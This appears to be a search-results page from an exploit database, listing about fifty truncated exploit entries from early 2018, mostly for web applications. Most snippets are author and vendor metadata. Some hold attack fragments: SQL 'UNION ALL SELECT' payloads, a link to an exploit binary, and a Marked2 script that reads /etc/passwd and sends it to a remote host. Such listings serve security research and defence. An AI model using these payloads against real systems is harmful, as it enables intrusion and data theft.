41207 matches found
Flash ActiveX 18.0.0.194 - Code Execution
Flash ActiveX 18.0.0.194 - Code Execution CVE-2015-5112 Pop up a calculator - Requires Flash ActiveX 18.0.0.194 Download: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/44742.swf...
TypeSetter CMS 5.1 - Cross-Site Request Forgery
TypeSetter CMS 5.1 - Cross-Site Request Forgery Exploit Title: TypeSetter CMS 5.1 Cross Site Request Forgery Date: 10-02-2018 Exploit Author: Navina Asrani Contact: https://twitter.com/NavinaSanjay Website: https://securitywarrior9.blogspot.in/ Vendor Homepage: https://www.typesettercms.com/...
TypeSetter CMS 5.1 - Host Header Injection
TypeSetter CMS 5.1 - Host Header Injection Exploit Title: TypeSetter CMS 5.1 Host Header Injection Date: 10-02-2018 Exploit Author: Navina Asrani Contact: https://twitter.com/NavinaSanjay Website: https://securitywarrior9.blogspot.in/ Vendor Homepage: https://www.typesettercms.com/ Version: 5.1...
LogicalDOC Enterprise 7.7.4 - Root Remote Code Execution
LogicalDOC Enterprise 7.7.4 - Root Remote Code Execution LogicalDOC Enterprise 7.7.4 Post-Auth Command Execution Via Binary Path Manipulation Vendor: LogicalDOC Srl Product web page: https://www.logicaldoc.com Affected version: 7.7.4 7.7.3 7.7.2 7.7.1 7.6.4 7.6.2 7.5.1 7.4.2 7.1.1 Summary:...
LogicalDOC Enterprise 7.7.4 - Directory Traversal
LogicalDOC Enterprise 7.7.4 - Directory Traversal LogicalDOC Enterprise 7.7.4 Multiple Directory Traversal Vulnerabilities Vendor: LogicalDOC Srl Product web page: https://www.logicaldoc.com Affected version: 7.7.4 7.7.3 7.7.2 7.7.1 7.6.4 7.6.2 7.5.1 7.4.2 7.1.1 Summary: LogicalDOC is a free...
LogicalDOC Enterprise 7.7.4 - User Enumeration
LogicalDOC Enterprise 7.7.4 - User Enumeration LogicalDOC Enterprise 7.7.4 Username Enumeration Weakness Vendor: LogicalDOC Srl Product web page: https://www.logicaldoc.com Affected version: 7.7.4 7.7.3 7.7.2 7.7.1 7.6.4 7.6.2 7.5.1 7.4.2 7.1.1 Summary: LogicalDOC is a free document management...
Paypal Clone Script 1.0.9 - id acctype SQL Injection
Paypal Clone Script 1.0.9 - id acctype SQL Injection Exploit Title: Paypal / Money Transfer Clone Script 1.0.9 - SQL Injection Dork: N/A Date: 2018-02-10 Exploit Author: Borna nematzadeh L0RD or [email protected] Vendor Homepage:...
Readymade Video Sharing Script 3.2 - search SQL Injection
Readymade Video Sharing Script 3.2 - search SQL Injection Exploit Title: Readymade Video Sharing Script - SQL Injection Error Based Google Dork: NA Date: 10.02.2018 Exploit Author: Varun Bagaria Vendor Homepage: https://www.phpscriptsmall.com/ Software Link:...
Multi Language Olx Clone Script - Cross-Site Scripting
Multi Language Olx Clone Script - Cross-Site Scripting Exploit Title: Multi Language Olx Clone Script - Stored XSS Date: 08.02.2018 Exploit Author: Varun Bagaria Web: Vendor Homepage: https://www.phpscriptsmall.com/ Software Link: https://www.phpscriptsmall.com/product/olx-clone/ Category: Web...
Naukri Clone Script 3.0.3 - indus SQL Injection
Naukri Clone Script 3.0.3 - indus SQL Injection Exploit Title: Naukri Clone Script 3.0.3 - 'indus' SQL Injection Dork: N/A Date: 2018-02-08 Exploit Author: Borna nematzadeh L0RD or [email protected] Vendor Homepage: https://www.phpscriptsmall.com/product/naukri-clone-script/ Version:...
LibreOffice 6.0.1 - WEBSERVICE Remote Arbitrary File Disclosure
LibreOffice 6.0.1 - WEBSERVICE Remote Arbitrary File Disclosure Vulnerability description CVE-2018-6871 First part LibreOffice supports COM.MICROSOFT.WEBSERVICE function: https://support.office.com/en-us/article/webservice-function-0546a35a-ecc6-4739-aed7-c0b7ce1562c4 The function is required to...
macOS Kernel - Use-After-Free Due to Lack of Locking in AppleEmbeddedOSSupportHostClient::registerNotificationPort
macOS Kernel - Use-After-Free Due to Lack of Locking in AppleEmbeddedOSSupportHostClient::registerNotificationPort / AppleEmbeddedOSSupportHost.kext is presumably involved in the communication with the OS running on the touch bar on new MBP models. Here's the userclient's registerNotificationPort...
MalwareFox AntiMalware 2.74.0.150 - Privilege Escalation
MalwareFox AntiMalware 2.74.0.150 - Privilege Escalation / Title: MalwareFox AntiMalware 2.74.0.150 - Local Privilege Escalation Date: 03/02/2018 Author: Souhail Hammou Vendor Homepage: https://www.malwarefox.com/ Version: 2.74.0.150 Tested on: Windows 7 32-bit / Windows 10 64-bit CVE:...
Online Test Script 2.0.7 - cid SQL Injection
Online Test Script 2.0.7 - cid SQL Injection Exploit Title: Online Test Script 2.0.7 - 'cid' SQL Injection Dork: N/A Date: 2018-02-07 Exploit Author: Borna nematzadeh L0RD or [email protected] Vendor Homepage: https://www.phpscriptsmall.com/product/online-test-script/ Version: 2.0.7...
Cisco ASA - Crash (PoC)
Cisco ASA - Crash PoC Cisco ASA CVE-2018-0101 Crash PoC We basically just read: https://www.nccgroup.trust/globalassets/newsroom/uk/events/2018/02/reconbrx2018-robin-hood-vs-cisco-asa.pdf @zerosum0x0, @jennamagius, @alephnaught import requests, sys headers = headers'User-Agent' = 'Open AnyConnect...
Android - getpidcon Permission Bypass in KeyStore Service
Android - getpidcon Permission Bypass in KeyStore Service The keystore binder service "android.security.IKeystoreService" allows users to issue several commands related to key management, including adding, removing, exporting and generating cryptographic keys. The service is accessible to many...
Entrepreneur Dating Script 2.0.2 - Authentication Bypass
Entrepreneur Dating Script 2.0.2 - Authentication Bypass Exploit Title: Entrepreneur Dating Script 2.0.2 - Authentication Bypass Dork: N/A Date: 2018-02-07 Exploit Author: Borna nematzadeh L0RD or [email protected] Vendor Homepage:...
Adobe Coldfusion 11.0.03.292866 - BlazeDS Java Object Deserialization Remote Code Execution
Adobe Coldfusion 11.0.03.292866 - BlazeDS Java Object Deserialization Remote Code Execution Exploit Title: Adobe Coldfusion BlazeDS Java Object Deserialization RCE Date: February 6, 2018 Exploit Author: Faisal Tameesh @DreadSystems Company: Depth Security https://depthsecurity.com Version: Adobe...
Asterisk 13.17.2 - chan_skinny Remote Memory Corruption
Asterisk 13.17.2 - chan_skinny Remote Memory Corruption Exploit Author: Juan Sacco - http://exploitpack.com Vulnerability found using Exploit Pack v10 - Fuzzer module CVE-2017-17090 - AST-2017-013 Tested on: Asterisk 13.17.2dfsg-2 Description: Asterisk is prone to a remote unauthenticated memory...
Marked2 - Local File Disclosure
Marked2 - Local File Disclosure var file = "file:///etc/passwd"; var extract = "http://dev.example.com:1337/"; function geturl var xmlHttp = new XMLHttpRequest; xmlHttp.open"GET", url, false; xmlHttp.sendnull; return xmlHttp.responseText; function stealdata var xhr = new XMLHttpRequest;...
Matrimonial Website Script 2.1.6 - uid SQL Injection
Matrimonial Website Script 2.1.6 - uid SQL Injection Exploit Title: Matrimonial Website Script 2.1.6 - 'uid' SQL Injection Dork: N/A Date: 2018-02-03 Exploit Author: Borna nematzadeh L0RD or [email protected] Vendor Homepage:...
NixCMS 1.0 - category_id SQL Injection
NixCMS 1.0 - category_id SQL Injection Exploit Title: NixCMS 1.0 - 'category_id' SQL Injection Dork: N/A Date: 03.02.2018 Vendor: https://www.nixdesign.de Software Link: https://www.nixdesign.de/nix-cms/ Demo: http://www.jamaram.de/ Version: 1.0 Tested on: WiN10X64 Exploit Author: Bora Bozdogan...
Joomla! Component jLike 1.0 - Information Leak
Joomla! Component jLike 1.0 - Information Leak "; foreach$l as $u echo "- ID\n\n\n\n:\n" .$u'id'.""; echo "- Name\n\n:\n" .$u'name'.""; echo "- Email\n:\n" .$u'email'.""; echo ""; echo "-----------------------------"; elseecho "- No user"; ?...
Joomla! Component Zh GoogleMap 8.4.0.0 - SQL Injection
Joomla! Component Zh GoogleMap 8.4.0.0 - SQL Injection input name="id" value="-11 UNION ALL SELECT...
Student Profile Management System Script 2.0.6 - Authentication Bypass
Student Profile Management System Script 2.0.6 - Authentication Bypass Exploit title: Student Profile Management System Script 2.0.6 - Admin Panel Authentication Bypass Dork: "Powered by: i-Net Solution" Date: 2018-02-06 Exploit Author: Borna nematzadeh L0RD or [email protected] Vendo...
Wonder CMS 2.3.1 - Host Header Injection
Wonder CMS 2.3.1 - Host Header Injection Exploit Title: Wonder CMS 2.3.1 Host Header Injection Date: 30-01-2018 Exploit Author: Samrat Das Contact: http://twitter.com/SamratDas93 Website: https://securitywarrior9.blogspot.in/ Vendor Homepage: https://www.wondercms.com/ Version: 2.3.1 CVE :...
Claymore Dual GPU Miner 10.5 - Format String
Claymore Dual GPU Miner 10.5 - Format String Claymore’s Dual GPU Miner 10.5 and below is vulnerable to a format strings vulnerability. This allows an unauthenticated attacker to read memory addresses, or immediately terminate the mining process causing a denial of service. After reading about the...
Netis WF2419 Router - Cross-Site Scripting
Netis WF2419 Router - Cross-Site Scripting Exploit Title: Netis-WF2419 HTML Injection Date: 20/01/2018 Exploit Author: Sajibe Kanti Author Contact: https://twitter.com/@sajibekantibd Vendor Homepage: http://www.netis-systems.com/ Version: Netis-WF2419, V3.2.41381 Tested on: Windows 10 CVE :...
HPE iLO 4 2.53 - Add New Administrator User
HPE iLO 4 2.53 - Add New Administrator User !/usr/bin/env python """ Exploit trigger was presented @reconbrx 2018 Vulnerability found and documented by synacktiv: https://www.synacktiv.com/posts/exploit/rce-vulnerability-in-hp-ilo.html Original advisory from HP:...
MalwareFox AntiMalware 2.74.0.150 - Local Privilege Escalation
MalwareFox AntiMalware 2.74.0.150 - Local Privilege Escalation / Title : MalwareFox AntiMalware 2.74.0.150 - Local Privilege Escalation Date : 02/02/2018 Author : Souhail Hammou Vendor Homepage : https://www.malwarefox.com/ Version : 2.74.0.150 Tested on : Windows 7 32-bit / Windows 10 64-bit CVE...
BOCHS 2.6-5 - Local Buffer Overflow
BOCHS 2.6-5 - Local Buffer Overflow Exploit Author: Juan Sacco - http://exploitpack.com Vulnerability found using Exploit Pack v10 - Fuzzer module An attacker could exploit this vulnerability to execute arbitrary code in the context of the application. Failed exploit attempts will result in a...
Online Voting System - Authentication Bypass
Online Voting System - Authentication Bypass Exploit Title: Online Voting System - Authentication Bypass Date: 02.02.2018 Vendor Homepage: http://themashabrand.com Software Link: http://themashabrand.com/p/votin Demo: http://localhost/Onlinevoting Version: 1.0 Category: Webapps Exploit Author:...
Joomla! Component Zh BaiduMap 3.0.0.1 - SQL Injection
Joomla! Component Zh BaiduMap 3.0.0.1 - SQL Injection input name="id" value="-11 UNION ALL SELECT...
WordPress Core - load-scripts.php Denial of Service
WordPress Core - load-scripts.php Denial of Service EDB Note: python doser.py -g...
Wonder CMS 2.3.1 - Unrestricted File Upload
Wonder CMS 2.3.1 - Unrestricted File Upload Affected Code: public static function uploadFile + - if ! wCMS::$loggedIn && ! isset$FILES'uploadFile' && ! isset$REQUEST'token' return; + private static function uploadFileAction - if isset$REQUEST'token' && $REQUEST'token' == wCMS::generateToken &&...
Joomla! Component Zh YandexMap 6.2.1.0 - id SQL Injection
Joomla! Component Zh YandexMap 6.2.1.0 - id SQL Injection input name="id" value="-11 UNION ALL SELECT...
Joomla! Component JSP Tickets 1.1 - SQL Injection
Joomla! Component JSP Tickets 1.1 - SQL Injection Exploit Title: Joomla! Component JSP Tickets 1.1 - SQL Injection Dork: N/A Date: 04.02.2018 Vendor Homepage: http://joomlaserviceprovider.com/ Software Link:...
Joomla! Component JEXTN Reverse Auction 3.1.0 - SQL Injection
Joomla! Component JEXTN Reverse Auction 3.1.0 - SQL Injection Exploit Title: Joomla! Component JEXTN Reverse Auction 3.1.0 - SQL Injection Dork: N/A Date: 01.02.2018 Vendor Homepage: http://jextn.com/ Software Link:...
Joomla! Component Jimtawl 2.1.6 - Arbitrary File Upload
Joomla! Component Jimtawl 2.1.6 - Arbitrary File Upload Exploit Title: Joomla! Component Jimtawl 2.2.5 - Arbitrary File Upload Dork: N/A Date: 01.02.2018 Vendor Homepage: http://janguo.de/ Software Link: https://extensions.joomla.org/extensions/extension/multimedia/streaming-a-broadcasting/jimtaw...
Advance Loan Management System - id SQL Injection
Advance Loan Management System - id SQL Injection Exploit Title: Advance Loan Management System - 'id' SQL Injection Date: 2018-01-31 Exploit Author: 8bitsec Vendor Homepage: https://codecanyon.net/ Software Link:...
Microsoft Windows Subsystem for Linux - execve() Local Privilege Escalation
Microsoft Windows Subsystem for Linux - execve Local Privilege Escalation define GNUSOURCE include include include include include include include include include include include include include include include define RINGSIZE 0x2000000 define PIPESIZE 0xb8 define PTRSIZE 0x8 define STRHDRSIZE 0x...
Real Estate Custom Script - route SQL Injection
Real Estate Custom Script - route SQL Injection Exploit Title: Real Estate Custom Script - 'route' SQL Injection Date: 2018-01-31 Exploit Author: 8bitsec Vendor Homepage: https://codecanyon.net/ Software Link: https://codecanyon.net/item/real-estate-custom-script/21268075 Version: 1.0 Tested on:...
Joomla! Component JMS Music 1.1.1 - SQL Injection
Joomla! Component JMS Music 1.1.1 - SQL Injection Exploit Title: Joomla! Component JMS Music 1.1.1 - SQL Injection Dork: N/A Date: 01.02.2018 Vendor Homepage: https://www.joommasters.com/ Software Link: https://extensions.joomla.org/extensions/extension/multimedia/multimedia-players/jms-music/...
FiberHome AN5506 - Remote DNS Change
FiberHome AN5506 - Remote DNS Change FIBERHOME AN5506 Unauthenticated Remote DNS Change Vulnerability Software Version RP2617 Device Model AN5506-04-F Vendor Homepage: www.fiberhome.com/ Date: 01/02/2018 Exploit Author: r0ots3c http://wandoelmo.com.br https://www.facebook.com/wsec.info Descriptio...
Fancy Clone Script - search_browse_product SQL Injection
Fancy Clone Script - search_browse_product SQL Injection Exploit Title: Fancy Clone Script - 'search_browse_product' SQL Injection Date: 2018-01-31 Exploit Author: 8bitsec Vendor Homepage: https://pofitec.com/ Software Link: https://pofitec.com/fancy-clone-script.php Version: 1.0 Tested on: Kali Linu...
Joomla! Component JE PayperVideo 3.0.0 - usr_plan SQL Injection
Joomla! Component JE PayperVideo 3.0.0 - usr_plan SQL Injection...
Joomla! Component JEXTN Membership 3.1.0 - usr_plan SQL Injection
Joomla! Component JEXTN Membership 3.1.0 - usr_plan SQL Injection...
IPSwitch MOVEit 8.1 9.4 - Cross-Site Scripting
IPSwitch MOVEit 8.1 9.4 - Cross-Site Scripting Exploit Title: IPSwitch MoveIt Stored Cross Site Scripting XSS Date: 1-31-2017 Software Link: https://www.ipswitch.com/moveit Affected Version: 8.1-9.4 only confirmed on 8.1 but other versions prior to 9.5 may also be vulnerable Exploit Author:...
Event Manager 1.0 - SQL Injection
Event Manager 1.0 - SQL Injection Exploit Title: Event Manager PHP Script 1.0 - SQL Injection Dork: N/A Date: 01.02.2018 Vendor Homepage: http://ezcode.pt/ Software Link: https://codecanyon.net/item/eventmanager-php-script-admin-panel/21280741 Version: 1.0 Category: Webapps Tested on:...
Joomla! Component JEXTN Classified 1.0.0 - sid SQL Injection
Joomla! Component JEXTN Classified 1.0.0 - sid SQL Injection Exploit Title: Joomla! Component JEXTN Classified 1.0.0 - SQL Injection Dork: N/A Date: 01.02.2018 Vendor Homepage: http://jextn.com/ Software Link:...